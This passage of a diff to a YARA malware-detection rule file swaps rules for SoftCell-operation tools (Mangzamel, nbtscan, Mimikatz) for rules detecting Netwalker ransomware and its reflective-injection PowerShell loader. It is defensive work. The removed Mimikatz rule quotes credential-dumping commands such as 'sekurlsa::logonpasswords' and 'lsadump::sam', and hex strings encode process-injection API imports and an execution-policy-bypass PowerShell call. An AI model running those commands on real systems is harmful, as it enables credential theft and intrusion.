?????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????D1??BA????????6B????8B??????03??????BA????????D1??89??????B8????????6B????BA????????D1??8B??????33??????C1????B9????????6B????B9????????D1??8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????D1??B8????????6B????8B??????03??????B8????????D1??89??????B9????????6B????B8????????D1??8B??????33??????C1????BA????????6B????BA????????D1??8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B???? }
+		$pattern2 = { CCCCCCCCCCA1????????C3CCCCCCCCCCCCCCCCCCCC538B??????5533??5785??74??8B??????85??74??8B????85??74??C1????50E8????????83????89??85??74??8B????5633??85??74??5653E8????????83????85??74??8B????85??74??8D??????89??????5150E8????????83????85??74??8B????8B??8B??????89????FF????8B????463B??72??39????B9????????5E0F44??5F8B??5D5BC35F5D33??5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC535556578B??????85??74??83????74??8B????85??74??8B??????85??74??33??85??74??8B??????660F1F??????85??74??8B??53FF????E8????????EB??E8????????8D????8B??FF????8B??53FF??83????85??75??463B????72??5F5E5D33??5BC35F5E5DB8????????5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??56E8????????8B????50E8????????83????85??75??A1????????6A??83????5650E8????????83????85??75??56E8????????83????85??74??8D????66??????74??83????83????75??33??5EC383????74??A1????????6A??83????5150E8????????83????85??74??B8????????5EC3CCCCCCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??A1????????83??????74??8B??????85??74??56E8????????8B??????????83????83????75??83??????74??66????????75??0FB7??83????72??83????76??83????66??????76??6A??8D????5650E8????????83????85??74??B8????????5EC333??5EC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??A1????????83??????74??51E8????????8B??83????85??74??8B??????????6A??83????5651E8????????83????85??74??B8????????5EC356E8????????83????33??5EC3CCCCCCCCCCCCCC535556576A??E8????????8B??83????85??0F84????????8B??660F1F??????0FB7????83????51E8????????8B??83????85??74??0FB7????51FF????57E8????????83????83????????????74??A1????????83??????74??6A??83????5750E8????????83????85??74??E8????????8B????3B????74??6A??51E8????????8B??83????85??74??E8????????6A??538B????FF??E8????????538B??????????FF??57E8????????83????8B??03??85??0F85????????55E8????????83????E8????????6A??8B??????????FF??E9????????CCCCCCCCCCCCCC83????5533??565739??????????0F84????????8B??????85??0F84????????8B??????85??0F84????????53E8????????8B??????????FF??83??????8B??74??E8????????FF????8B??????????FF??89??????E8????????8D??????516A??8B??????????8D??????516A??57FF??85??74??8B??????89????83????74??E8????????8B??????????FF??2B??3D????????77??83??????75??5B5F5E8B??5D83????C3BD????????5B5F5E8B??5D83????C35F5E33??5D83????C383????558B??????85??0F84????????5333??5733??89??????89??????E8????????8D??????518D??????8B??????????5157576A??FF????FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????56E8????????8D??????518D??????8B??????????51FF??????FF??????6A??FF????FF??85??74??33??39??????76??8B??????0F1F??????????E8????????8B??????68????????FF????8B??????????FF??FF??89??????8D????????????5053E8????????8B??83????85??74??FF??????68????????E8????????83????89????474683????3B??????72??8B??????FF??????E8????????83????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??E8????????FF????8B??????????FF??463B??72??53E8????????83????5EE8????????8D??????516A??FF????8B??????????FF??5F5B85??74??8D??????50FF????E8????????83????E8????????FF????8B??????????FF??55E8????????83????33??5D83????C2????CCCCCCCCCCCCCCCCCCCCCCCC83????568B??????85??74??E8????????8D??????516A??8B??????????56FF??85??74??8D??????5056E8????????83????E8????????568B??????????FF??33??5E83????C2????CCCCCCCCCCCC83????83????????????5356570F84????????A1????????83??????0F84????????55E8????????68????????6A??6A??8B??????????FF??8B??89??????85??0F84????????660F1F????????????C7??????????????C7??????????????C7??????????????E8????????8D??????518D??????8B??????????518D??????516A??6A??6A??6A??55FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????E8????????8B??????8D??????518D??????8B??????????518D??????51FF??????566A??6A??55FF??85??0F84????????33??33??89??????39??????0F86????????0F1F??????????FF??E8????????83????85??75??FF????E8????????83????85??74??E8????????68????????FF??8B??????????55FF??89??????85??74??6A??E8????????8B??83????85??74??8B??????8D????????????5189????8B??????5389????E8????????8B??83????85??74??5568????????E8????????83????89????478B??????8B??????83????4089??????3B??????0F82????????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??0F1F????E8????????FF????8B??????????FF??463B??72??53E8????????83????FF??????E8????????83????E8????????68????????8B??????????FF??E9????????5D5F5E33??5B83????C2????CCCCCC83????53558B??????565785??0F84????????8B????8D??????516A??55C7??????????????FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????6A??8D??????6A??50E8????????33??83????B8????????66????????39??????0F8E????????8B??????8D??????5083????C7??????????????438B??89??????0F10??????8B??510F11??FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????8B??????8D??????C7??????????????33??52508B??FF????83????????0F84????????FF??????E8????????83????85??0F85????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????33?? }
+		$pattern3 = { CCCCCCCCCC558B??FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF?????????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "327ce3f883a5b59e966b5d0e3a321156" and all of them )
+		uint16( 0 ) == 0x5a4d and any of ( $pattern* )
 }
 
-rule TRELLIX_ARC_Mangzamel_Softcell : TROJAN FILE
+rule TRELLIX_ARC_Netwalker_Signed : FILE
 {
 	meta:
-		description = "Rule to detect Mangzamel used in the SoftCell operation"
+		description = "Rule to detect Netwalker ransomware digitally signed."
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b0473362-7e03-5127-aee5-b5a4f05bcc8e"
-		date = "2019-06-25"
-		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L145-L176"
+		id = "6806b917-2e02-57e3-887a-b4c12db83653"
+		date = "2020-03-30"
+		modified = "2020-11-20"
+		reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L30-L47"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "3666c645943eb8469096b8093c74e4d819299d3ffc2b99e37a506d8ef09e90c4"
+		logic_hash = "d78ed22771d7c93516375afb8fd2fd7baa40a357ec3c247939a10d11f80ae226"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
-		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Mangzamel"
-		actor_type = "Apt"
-		actor_group = "Unknown"
-
-	strings:
-		$s1 = "Change Service Mode to user logon failure.code:%d" fullword ascii
-		$s2 = "spoolsvs.exe" fullword wide
-		$s3 = "System\\CurrentControlSet\\Services\\%s\\parameters\\%s" fullword ascii
-		$s4 = "Please Correct [-s %s]" fullword ascii
-		$s5 = "Please Correct [-m %s]" fullword ascii
-		$op0 = { 59 8d 85 64 ff ff ff 50 c7 85 64 ff ff ff 94 }
-		$op1 = { c9 c2 08 00 81 c1 30 34 00 00 e9 cf 9b ff ff 55 }
-		$op2 = { 80 0f b6 b5 68 ff ff ff c1 e2 04 0b d6 0f b6 b5 }
+		tags = "FILE"
+		note = "The rule will hit also some Dridex samples digitally signed"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "ef64bb4aa42ef5a8a2e3858a636bce40" and all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/CN=EWBTCAXQKUMDTHCXCZ" and pe.signatures [ i ] . serial == "17:16:bb:93:fb:a9:a2:41:ba:a8:2e:c7:5e:ff:0c" or pe.signatures [ i ] . thumbprint == "a4:28:e9:4a:61:3a:1f:cf:ff:08:bf:e7:61:51:64:31:1a:6f:87:bc" )
 }
-
-rule TRELLIX_ARC_Nbtscan_Utility_Softcell : UTILITY FILE
+rule TRELLIX_ARC_Netwalker : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect nbtscan utility used in the SoftCell operation"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "a2a8dd43-0d30-5da5-9dd3-6ba9f6473c40"
-		date = "2019-06-25"
-		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L178-L209"
+		description = "Rule based on code overlap in RagnarLocker ransomware"
+		author = "McAfee ATR team"
+		id = "80097a40-534a-5e1b-8fde-e4d832d76698"
+		date = "2020-06-14"
+		modified = "2020-11-20"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L49-L75"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "6079f1363578f82fd38971d0c8f69cc156f7f678c3f2be22c5d9c3748dc80b1f"
+		logic_hash = "8c56ebed9e097d294045de46942c708da9ba7e01475dcecb0c3d41fcc8004780"
 		score = 75
-		quality = 45
-		tags = "UTILITY, FILE"
+		quality = 70
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "utility"
-		malware_family = "Utility:W32/NbtScan"
-		actor_type = "Apt"
+		malware_type = "ransomware"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "nbtscan 1.0.35 - 2008-04-08 - http://www.unixwiz.net/tools/" fullword ascii
-		$s2 = "parse_target_cb.c" fullword ascii
-		$s3 = "ranges. Ranges can be in /nbits notation (\"192.168.12.0/24\")" fullword ascii
-		$s4 = "or with a range in the last octet (\"192.168.12.64-97\")" fullword ascii
-		$op0 = { 52 68 d4 66 40 00 8b 85 58 ff ff ff 50 ff 15 a0 }
-		$op1 = { e9 1c ff ff ff 8b 45 fc 8b e5 5d c3 cc cc cc cc }
-		$op2 = { 59 59 c3 8b 65 e8 ff 75 d0 ff 15 34 60 40 00 ff }
+		$0 = {C88BF28B4330F76F3803C88B434813F2F76F2003C88B433813F2F76F3003C88B434013F2F76F2803C88B432813F2F76F4003C8894D6813F289756C8B4338F76F388BC88BF28B4328F76F4803C88B434813F2F76F2803C88B433013F2F76F400FA4CE}
+		$1 = {89542414895424108BEA8BDA8BFA423C22747C3C5C75588A023C5C744F3C2F744B3C2274473C6275078D5702B008EB3F3C6675078D5302B00CEB343C6E75078D5502B00AEB293C72750B8B542410B00D83C202EB1A3C74750B8B542414B00983C2}
+		$2 = {C8894D7013F28975748B4338F76F408BC88BF28B4340F76F3803C88B433013F2F76F4803C88B434813F2F76F3003C8894D7813F289757C8B4348F76F388BC88BF28B4338F76F4803C88B434013F2F76F400FA4CE}
+		$3 = {C07439473C2F75E380FB2A74DEEB2D8D4ABF8D422080F9190FB6D80FB6C28AD60F47D88AC6042080EA410FB6C880FA190FB6C60F47C83ACB754B46478A1684D2}
+		$4 = {8B433013F2F76F0803C88B432013F2F76F1803C88B0313F2F76F3803C88B430813F2F76F3003C88B433813F2F72F03C8894D3813F289753C8B4338F76F088BC8}
+		$5 = {F73101320E32213234329832E3320C332D334733643383339133A833BD33053463347C34543564358335AE36C3362937E9379A39BA390A3A203A443A183B2B3B}
+		$6 = {8B431813F2F76F4803C88B432813F2F76F3803C88B434013F2F76F200FA4CE0103C903C88B432013F2F76F4003C88B433013F2F76F3003C8894D6013F2897564}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "2fa43c5392ec7923ababced078c2f98d" and all of them )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
 }
-
-rule TRELLIX_ARC_Mimikatz_Utility_Softcell : HACKTOOL FILE
+rule TRELLIX_ARC_Win_Netwalker_Reflective_Dll_Injection_Decoded : RANSOMWARE
 {
 	meta:
-		description = "Rule to detect Mimikatz utility used in the SoftCell operation"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "0c01a2f6-cf3c-57b3-8f19-94d320422658"
-		date = "2019-06-25"
-		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L211-L258"
+		description = "Rule to detect Reflective DLL Injection Powershell Script dropping Netwalker, after hexadecimal decoded and xor decrypted "
+		author = "McAfee ATR Team"
+		id = "9562c0b9-e7ac-5b96-99cc-1df91cb617af"
+		date = "2020-05-28"
+		modified = "2020-11-20"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ | https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L77-L140"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "4ccb44bf0d490a18e35290d904326ce14cdc92c96be1a38e6059431645233e37"
+		hash = "fd29001b8b635e6c51270788bab7af0bb5adba6917c278b93161cfc2bc7bd6ae"
+		logic_hash = "e99c045f39e7933e877a4df7793aa5ea6be5a782bb079419501929ba99844dec"
 		score = 75
-		quality = 68
-		tags = "HACKTOOL, FILE"
+		quality = 30
+		tags = "RANSOMWARE"
 		rule_version = "v1"
-		malware_type = "hacktool"
-		malware_family = "Hacktool:W32/Mimikatz"
-		actor_type = "Apt"
-		actor_group = "Unknown"
+		malware_type = "ransomware"
 
 	strings:
-		$s1 = "livessp.dll" fullword wide
-		$s2 = "\\system32\\tapi32.dll" fullword wide
-		$s3 = " * Process Token : " fullword wide
-		$s4 = "lsadump" fullword wide
-		$s5 = "-nl - skip lsa dump..." fullword wide
-		$s6 = "lsadump::sam" fullword wide
-		$s7 = "lsadump::lsa" fullword wide
-		$s8 = "* NL$IterCount %u, %u real iter(s)" fullword wide
-		$s9 = "* Iter to def (%d)" fullword wide
-		$s10 = " * Thread Token  : " fullword wide
-		$s11 = " * RootKey  : " fullword wide
-		$s12 = "lsadump::cache" fullword wide
-		$s13 = "sekurlsa::logonpasswords" fullword wide
-		$s14 = "(commandline) # %s" fullword wide
-		$s15 = ">>> %s of '%s' module failed : %08x" fullword wide
-		$s16 = "UndefinedLogonType" fullword wide
-		$s17 = " * Username : %wZ" fullword wide
-		$s18 = "logonPasswords" fullword wide
-		$s19 = "privilege::debug" fullword wide
-		$s20 = "token::elevate" fullword wide
-		$op0 = { e8 0b f5 00 00 90 39 35 30 c7 02 00 75 34 48 8b }
-		$op1 = { eb 34 48 8b 4d cf 48 8d 45 c7 45 33 c9 48 89 44 }
-		$op2 = { 48 3b 0d 34 26 01 00 74 05 e8 a9 31 ff ff 48 8b }
+		$api0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 20 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 22 29 5d }
+		$api1 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 22 29 5d }
+		$api2 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4c 6f 61 64 4c 69 62 72 61 72 79 41 22 29 5d }
+		$api3 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 57 72 69 74 65 50 72 6f 63 65 73 73 4d 65 6d 6f 72 79 22 29 5d }
+		$api4 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 46 72 65 65 22 29 5d }
+		$api5 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 22 29 5d }
+		$api6 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 6c 6f 73 65 48 61 6e 64 6c 65 22 29 5d }
+		$api7 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 45 78 22 29 5d }
+		$api8 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 22 29 5d }
+		$api9 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4f 70 65 6e 50 72 6f 63 65 73 73 22 29 5d }
+		$api10 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d }
+		$artifact0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d }
+		$artifact1 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 50 74 72 54 6f 53 74 72 75 63 74 75 72 65 }
+		$artifact2 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 52 65 61 64 49 6e 74 31 36 }
+		$artifact3 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73}
+		$artifact4 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73 20 2d 66 69 6c 65}
+		$artifact5 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 30 20 2c 20 4d 61 6e 64 61 74 6f 72 79}
